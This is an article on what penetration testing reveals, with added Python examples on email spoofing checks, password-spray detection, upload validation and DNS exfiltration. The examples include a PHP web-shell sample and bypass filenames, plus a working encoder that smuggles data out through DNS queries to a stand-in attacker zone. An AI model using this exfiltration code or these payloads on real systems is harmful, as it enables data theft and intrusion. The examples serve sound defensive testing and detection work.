Comprehensive penetration testing contributes to the security conversation by showing organizations which cybersecurity controls will best reduce risk from the exploits attackers will actually attempt. Penetration tests, which may include both unauthenticated and authenticated testing, should encompass technical, physical, and human tests, alone and in combination, revealing the specific cascading sequences of exploits (kill chains) an attacker would follow.
Here’s how organizations can get the most out of pen tests:
- Understand how well email safeguards work.
We all know email systems stand on the front lines of the ransomware wars. Detailed penetration testing will reveal how well an organization’s email system handles various attacks. First, comprehensive penetration testing will assess email platform vulnerabilities such as open relay, user enumeration, missing rate limiting, MX record bypass (delivering mail straight to the origin mail server, around the filtering gateway named in the MX record), and spoofing misconfigurations such as absent or permissive SPF and DMARC policies. It also makes sense to test whether legacy authentication paths, such as an exposed Exchange Web Services endpoint or native Outlook client authentication, sit outside the organization’s multi-factor authentication (MFA) coverage and so allow MFA bypass. Additionally, the team must thoroughly test all inbound email controls with a range of messages containing malicious attachments and links, and should test outbound data loss prevention controls as well. With thorough email penetration testing, organizations can build a roadmap of remediation priorities for this broad expanse of every organization’s attack surface.
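As an added example (not code from the original article or its author), the following Python script shows the spoofing-misconfiguration part of an email assessment: it reads a domain's SPF and DMARC TXT records and decides whether a tester could send mail with a forged From: header. The DNS data is constructed inline so the script runs offline; the domain names, records and thresholds are illustrative assumptions, not findings about any real organization.

```python
import re

# Constructed sample DNS TXT data keyed by record name (no live lookups are made).
# The names are illustrative; they are not assessments of real domains.
SAMPLE_TXT = {
    "example.com": ["v=spf1 include:_spf.example.net -all"],
    "_dmarc.example.com": ["v=DMARC1; p=reject; rua=mailto:dmarc@example.com"],
    "weak.example": ["v=spf1 ip4:192.0.2.0/24 ~all"],
    "_dmarc.weak.example": ["v=DMARC1; p=none; rua=mailto:reports@weak.example"],
    "open.example": ["v=spf1 +all"],
    "none.example": [],
}


def parse_spf(records):
    """Return the SPF mechanisms and the qualifier ('+', '-', '~', '?') on 'all'."""
    spf = [r for r in records if r.lower().startswith("v=spf1")]
    if not spf:
        return None
    result = {"all": None, "mechanisms": spf[0].split()[1:]}
    for mech in result["mechanisms"]:
        qualifier, body = (mech[0], mech[1:]) if mech[0] in "+-~?" else ("+", mech)
        if body.lower() == "all":
            result["all"] = qualifier
    return result


def parse_dmarc(records):
    """Return DMARC tags as a dict (e.g. {'v': 'DMARC1', 'p': 'reject'}) or None."""
    rec = [r for r in records if r.upper().replace(" ", "").startswith("V=DMARC1")]
    if not rec:
        return None
    tags = {}
    for part in rec[0].split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spoofability(domain, txt=SAMPLE_TXT):
    """Judge whether mail with a forged From: <domain> would be blocked by receivers."""
    spf = parse_spf(txt.get(domain, []))
    dmarc = parse_dmarc(txt.get("_dmarc." + domain, []))
    findings = []

    if spf is None:
        findings.append("no SPF record")
    elif spf["all"] == "+":
        findings.append("SPF '+all' authorizes every sender on the Internet")
    elif spf["all"] in (None, "?"):
        findings.append("SPF has no failing 'all' mechanism")
    elif spf["all"] == "~":
        findings.append("SPF '~all' is a softfail; many receivers still deliver")

    policy, pct = None, 100
    if dmarc is None:
        findings.append("no DMARC record")
    else:
        policy = dmarc.get("p", "none").lower()
        raw_pct = dmarc.get("pct", "100")
        pct = int(raw_pct) if raw_pct.isdigit() else 100
        if policy == "none":
            findings.append("DMARC p=none only reports spoofed mail, it does not block it")
        elif pct < 100:
            findings.append(f"DMARC pct={pct} leaves {100 - pct}% of failing mail unenforced")

    # SPF alone is evaluated against the envelope sender, so the visible From:
    # header can still be forged; only an enforcing DMARC policy ties the From:
    # domain to an aligned SPF or DKIM result.
    enforced = policy in ("quarantine", "reject") and pct == 100
    return {"domain": domain, "spoofable": not enforced, "findings": findings}


if __name__ == "__main__":
    for name in ("example.com", "weak.example", "open.example", "none.example"):
        print(assess_spoofability(name))
```

In a real engagement the records come from DNS (for example `dig +short TXT _dmarc.example.com`) and the verdict is confirmed by actually sending a test message to a mailbox the client controls, because receiver behaviour on softfail and on `p=none` varies.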
- Learn where authentication and identification schemes are vulnerable.
Authentication and identification controls are a favorite avenue of attack for hackers. Common ways of defeating password controls include spraying, finding, intercepting, cracking, guessing, relaying, bypassing, and simply asking for passwords. Do users actually choose strong passwords, or do they satisfy length and complexity rules with predictable patterns such as a season followed by the year? Can password hashes be intercepted and relayed or passed? Is MFA deployed for all essential applications and services? Is the MFA deployment susceptible to bypass? Will users divulge credentials to unvetted requesters? If the team doesn’t know the answers to all of these questions, comprehensive penetration testing can offer important insights.
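Password spraying is the attack in this list that a defender can recognize from the authentication log alone, and a good test report pairs the attack with the detection the client should have had. The following Python is an added example, not code from the original article or its author: it parses a small, constructed authentication log and separates a spray (few passwords against many accounts from one source) from a brute-force attempt (many passwords against one account). The log format, field names and thresholds are assumptions for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one source sprays six accounts (and lands on frank),
# one brute-forces alice, and one is an ordinary user who mistyped once.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=203.0.113.5 user=alice result=FAIL
2024-05-01T10:00:31Z src=203.0.113.5 user=bob result=FAIL
2024-05-01T10:01:02Z src=203.0.113.5 user=carol result=FAIL
2024-05-01T10:01:33Z src=203.0.113.5 user=dave result=FAIL
2024-05-01T10:02:04Z src=203.0.113.5 user=erin result=FAIL
2024-05-01T10:02:35Z src=203.0.113.5 user=frank result=OK
2024-05-01T10:05:00Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:05:10Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:05:20Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:05:30Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:05:40Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:05:50Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:06:00Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:06:10Z src=198.51.100.7 user=alice result=FAIL
2024-05-01T10:07:00Z src=192.0.2.9 user=bob result=FAIL
2024-05-01T10:07:20Z src=192.0.2.9 user=bob result=OK
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


def parse_events(text):
    """Turn log lines into dicts; lines that do not match the assumed format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": m["src"],
            "user": m["user"],
            "result": m["result"],
        })
    return events


def analyze_auth(events, window=timedelta(minutes=10), spray_users=5, brute_fails=6):
    """Classify each source as password-spray, brute-force, or normal.

    A sliding window over that source's failures is used so that a slow spray
    spread over hours is not hidden by a count of failures per minute.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    verdicts = {}
    for src, evs in by_src.items():
        fails = sorted((e["ts"], e["user"]) for e in evs if e["result"] == "FAIL")
        kind, detail = "normal", {}
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = Counter(u for _, u in fails[start:end + 1])
            if len(users) >= spray_users:  # many accounts, one source: spray
                kind, detail = "password-spray", {"distinct_users": len(users), "attempts": end - start + 1}
                break
            if max(users.values()) >= brute_fails:  # one account hammered: brute force
                kind, detail = "brute-force", {"user": users.most_common(1)[0][0], "attempts": end - start + 1}
                break
        if kind != "normal":
            # A success from a source already flagged is the account that was just taken.
            detail["successes"] = sorted({e["user"] for e in evs if e["result"] == "OK"})
        verdicts[src] = {"kind": kind, **detail}
    return verdicts


if __name__ == "__main__":
    for src, verdict in analyze_auth(parse_events(SAMPLE_LOG)).items():
        print(src, verdict)
```

The spray threshold is deliberately on distinct accounts rather than total failures: a spray stays under per-account lockout limits by design, which is why lockout policy alone does not catch it. In production the source key should also consider the user agent or session, since sprays against cloud identity providers are routinely spread across many source addresses.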
- Determine which employees are vulnerable to social engineering attacks.
Phishing simulation tools like KnowBe4 and Cofense PhishMe are great training tools, but nothing substitutes for an actual concerted set of social engineering attacks followed by illustrative technical exploits. Starting with a thorough information-gathering phase, a combination of email phishing, phone vishing, and in-person social engineering puts employees to the test. Carried out by experienced penetration testers, social engineering attacks are combined with technical attacks that reveal the true impact of a successful social engineering breach. Only by illustrating social engineering kill chains can an organization determine which employees are vulnerable, and what the potential impact of a breach would be.
- Find out which applications are poorly coded.
Applications are architected and developed in many different ways, and not all have equal security postures. Black box, or unauthenticated, application testing can expose vulnerabilities in platforms, web services, and authentication configurations. Authenticated testing can reveal vulnerabilities in session management, privilege escalation, and session hijacking. Applications also give attackers ample opportunity to introduce malicious payloads via file uploads and other data input paths, where a check that trusts the client-supplied file name or content type is easily bypassed. Mobile applications add multiple, disparate client platforms to the mix, and determining how mobile clients and browsers handle sensitive information is a detailed process. Without deep testing, it’s not possible to accurately assess application security.
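The file-upload weakness mentioned above is one of the most common application findings, so here is an added example (not code from the original article or its author) in Python showing the check testers usually find beside a hardened one. The weak check trusts the client-supplied name; the hardened one limits size, rejects null bytes and path components, requires exactly one allowlisted extension, and verifies that the file content starts with the bytes a genuine file of that type has. The size limit, allowlist and magic bytes are assumptions for the example, and the sample inputs are constructed.

```python
import os
import re

MAX_SIZE = 5 * 1024 * 1024  # assumed per-file limit for the example

# Allowed extensions mapped to the leading bytes a genuine file of that type has.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
}


def weak_validate(filename, data):
    """The check testers routinely find: a suffix test on the client-supplied name."""
    return filename.lower().endswith((".png", ".jpg", ".pdf"))


def hardened_validate(filename, data):
    """Return (accepted, reason, stored_name); stored_name is chosen by the server."""
    if not data or len(data) > MAX_SIZE:
        return False, "empty or oversized", None
    if "\x00" in filename:
        return False, "null byte in filename", None
    base = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied path
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        # Rejects 'shell.php.png' (double extension) and '.htaccess' (no stem).
        return False, "exactly one extension required", None
    stem, ext = parts[0], parts[1].lower()
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed", None
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension", None
    safe_stem = re.sub(r"[^A-Za-z0-9_-]", "_", stem)[:64]
    return True, "ok", f"{safe_stem}.{ext}"


# Constructed sample uploads: (client filename, first bytes of content).
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP = b"<?php system($_GET['c']); ?>"
SAMPLES = [
    ("Report Q1.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"),
    ("shell.php", PHP),
    ("shell.php.png", PNG),          # double extension
    ("photo.png", PHP),              # PHP source behind an image name
    ("shell.php\x00.png", PNG),      # null-byte truncation trick
    ("..\\..\\www\\logo.png", PNG),  # path in the file name
    (".htaccess", b"AddType application/x-httpd-php .png\n"),
]

if __name__ == "__main__":
    for name, content in SAMPLES:
        print(f"{name!r:28} weak={weak_validate(name, content)!s:5} hardened={hardened_validate(name, content)}")
```

Even with the hardened check, uploads should be stored outside the web root (or in a bucket that serves them as static bytes) under the server-chosen name, and served with a fixed `Content-Type` and `X-Content-Type-Options: nosniff`; a validator alone does not stop a web server that is configured to execute files by a name it was handed.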
- Examine weaknesses that let attackers egress and exfiltrate data.
Once a bad actor or actual malware finds its way onto the network, it’s essential to determine how much work it takes to phone home, import and execute additional malicious payloads, and actually exfiltrate data. Comprehensive penetration testing will assess the ability to create encrypted tunnels over commonly allowed TCP ports, for example SSH over port 443, which tests whether deep packet inspection and proxy controls actually notice a protocol that doesn’t match the port. Testing will also probe for weaknesses around importing and executing malicious payloads to see whether web filters and endpoint security controls intervene. Finally, thorough egress testing will use covert channels, e.g. ICMP or DNS, to exfiltrate sensitive data. Deeper testing will even examine whether attackers can use clandestine communication channels over these Internet protocols to set up tunnels back to command and control servers and remotely control hosts.
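To make the DNS covert channel concrete, here is an added Python example (not code from the original article or its author) that does both halves of an egress test: it encodes a constructed payload into DNS query names under an attacker-controlled zone, the way a tester's exfiltration tool would, and then runs a simple detector over a mix of those names and ordinary lookups to show what the client's DNS logs should have flagged. The zone name `c2.example`, the label sizes and the detection thresholds are assumptions; the detector takes the last two labels as the zone, which is a simplification of what a public-suffix-aware tool would do.

```python
import base64
import math
from collections import defaultdict

C2_ZONE = "c2.example"  # hypothetical attacker-controlled zone (assumption)


def encode_exfil(data, zone=C2_ZONE, label_len=60, labels_per_query=3):
    """Split data into DNS names of the form <seq>.<base32 labels>.<zone>.

    Base32 is used because DNS labels are case-insensitive; labels stay under
    63 bytes and the whole name under 253, the limits a resolver enforces.
    """
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + label_len] for i in range(0, len(text), label_len)]
    queries = []
    for seq, i in enumerate(range(0, len(labels), labels_per_query)):
        queries.append(".".join([str(seq), *labels[i:i + labels_per_query], zone]))
    return queries


def decode_exfil(queries, zone=C2_ZONE):
    """What the attacker's authoritative server does: reorder by sequence and decode."""
    zone_depth = len(zone.split("."))
    chunks = {}
    for q in queries:
        labels = q.rstrip(".").split(".")
        chunks[int(labels[0])] = "".join(labels[1:-zone_depth])
    text = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def shannon_entropy(s):
    """Bits per character; natural words sit around 3-4, base32 data near 5."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def detect_dns_exfil(queries, min_queries=5, min_avg_len=40, min_entropy=3.5):
    """Flag zones that receive many long, high-entropy, never-repeated subdomains."""
    by_zone = defaultdict(set)
    for q in queries:
        labels = q.rstrip(".").split(".")
        if len(labels) < 3:  # bare zone, nothing to carry data in
            continue
        by_zone[".".join(labels[-2:])].add(".".join(labels[:-2]))
    flagged = {}
    for zone, subs in by_zone.items():
        if len(subs) < min_queries:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        entropy = shannon_entropy("".join(s.replace(".", "") for s in subs))
        if avg_len >= min_avg_len and entropy >= min_entropy:
            flagged[zone] = {"unique_subdomains": len(subs),
                             "avg_len": round(avg_len, 1), "entropy": round(entropy, 2)}
    return flagged


# Constructed inputs: a payload to smuggle out and some ordinary-looking lookups.
SECRET = b"customer export: " + bytes(range(256)) * 4
BENIGN = ["www.example.com", "mail.example.com", "cdn.example.com",
          "api.example.com", "login.example.com", "static.example.com"]

if __name__ == "__main__":
    exfil = encode_exfil(SECRET)
    print(f"{len(SECRET)} bytes became {len(exfil)} queries, first: {exfil[0][:70]}...")
    assert decode_exfil(exfil) == SECRET
    print(detect_dns_exfil(BENIGN + exfil))
```

During a test the queries are issued with an ordinary resolver call (for example `dig` or `socket.getaddrinfo` against each name), so the data leaves through whatever DNS forwarder the client allows, which is the point of the exercise. The detection side is deliberately crude; a production rule would also look at query volume per client, NXDOMAIN rates, and TXT record sizes in the responses, which is how a command and control tunnel over the same channel shows up.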
Think of comprehensive penetration testing as an important component of the organization’s risk management program. Penetration testing can also shed light on intrusion detection, rogue host prevention, promiscuous protocols, cloud configuration errors, and weaknesses with peripheral devices. By knowing up-front about misconfigurations, default settings, patching, and a myriad of other challenges, systems and security personnel can get the jump on attackers. Remember that in all games of strategy offense trumps defense – it’s always one step ahead.
David Trepp, partner, Information Security Assessment Services Group, BPM LLP